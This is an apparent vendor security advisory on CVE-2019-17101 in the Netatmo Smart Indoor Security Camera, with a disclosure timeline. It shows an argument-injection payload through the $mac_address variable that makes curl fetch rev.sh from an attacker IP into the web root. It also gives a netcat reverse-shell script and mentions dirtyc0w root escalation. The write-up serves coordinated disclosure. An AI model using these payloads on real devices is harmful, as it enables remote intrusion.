Cracking the Netatmo Smart Indoor Security Camera

CVE-2019-17101 – Command execution due to unsanitized input

Indoor video surveillance has become one of the most frequent applications for IoT devices. In public places, offices or private homes, video surveillance helps deter crime and detect accidents before they become uncontainable. Security cameras have become a necessity but, in the IoT world, any new gadget added to a network can turn into a liability.

This article – part of a series developed in partnership with PCMag – aims to shed light on the security of the world’s best-sellers in the IoT space. PCMag contacted the research team at Bitdefender and asked us to look at several popular devices, including the Netatmo Smart Indoor Security Camera. More information is available in this article published on our partner’s website.

Vulnerabilities at a glance

The Bitdefender IoT Vulnerability Research Team discovered that the device is susceptible to an authenticated file write that leads to command execution (CVE-2019-17101), as well as to a privilege escalation via dirtyc0w – a local privilege escalation bug that exploits a race condition in the implementation of the copy-on-write mechanism in the kernel’s memory-management subsystem.

These might not be the droids you’re looking for

While our past research showed real-life examples where attackers could remotely hijack devices and control them from afar, this report is a tad different – the vulnerabilities outlined here may help a legitimate user or a third party in possession of the correct credentials to jailbreak the device and completely own it. And, while we’ll let you imagine a valid real-world scenario in which you’d pwn your own device, we’d also like to remind keen visitors to our blog that the ability to jailbreak is still a vulnerability and should be regarded as such.

Disclosure timeline

Dec 20, 2019: Bitdefender informs the vendor about the vulnerability
Dec 23, 2019: Vulnerability acknowledged on the vendor’s side  
Jan 14, 2020: Vulnerability is fixed, patch expected to deploy on Jan 20  
Jan 17, 2020: Patch is adopted among affected customers
Apr 23, 2020: Coordinated vulnerability disclosure

Authenticated file write leading to command execution

The webserver running on the camera is vulnerable to a file write that can be leveraged to obtain command execution with the privileges of the running server. To access this functionality, an attacker needs to know the secret path to the camera (for local attacks), or to obtain access to the user account (through credential stuffing, phishing etc.)  to send commands using the VPN connection.

The vulnerability occurs in the dtg_get_config.sh script due to improper handling of a user-controlled variable.

Vulnerable line:

evt_config_json=`curl -X GET
http://127.0.0.1:8083/configs/home/modules/id=$mac_address`

An attacker can use the shell’s expansion and word splitting functionality to give arbitrary arguments to the curl command through the $mac_address variable.

Example payload:

mac_address={,-o,/dev/null,192.168.50.131/rev.sh,-o,/system/www/secret/live/ping.sh}

Using this payload, the executed command will be:

 curl -X GET http://127.0.0.1:8083/configs/home/modules/id= -o
 /dev/null 192.168.50.131/rev.sh -o /system/www/secret/live/ping.sh

curl will first download the initial file into /dev/null, then download a second file from a location that we control (192.168.50.131/rev.sh in this case), writing it as /system/www/secret/live/ping.sh

To execute the malicious script, a request has to be made to /b3f2f2101057f1f956776c1431113a01/live/ping.sh

Example shell script for reverse shell:

#!/system/bin/sh
busyboxnc 192.168.50.131 4446 -e /bin/sh

This script will run with the privileges of the webserver, uid 1000 and gid 3003.

Note: there are multiple accessible scripts which don’t quote input variables, which are then interpreted by sh.

Privilege escalation

The device is susceptible to privilege escalation (an attacker can get root access) via the dirtyc0w exploit.

This vulnerability was discovered independently by both Bitdefender and Netatmo security and fixed. According to Netatmo, all indoor camera models have been updated to plug the dirtyc0w exploit since the end of February 2020.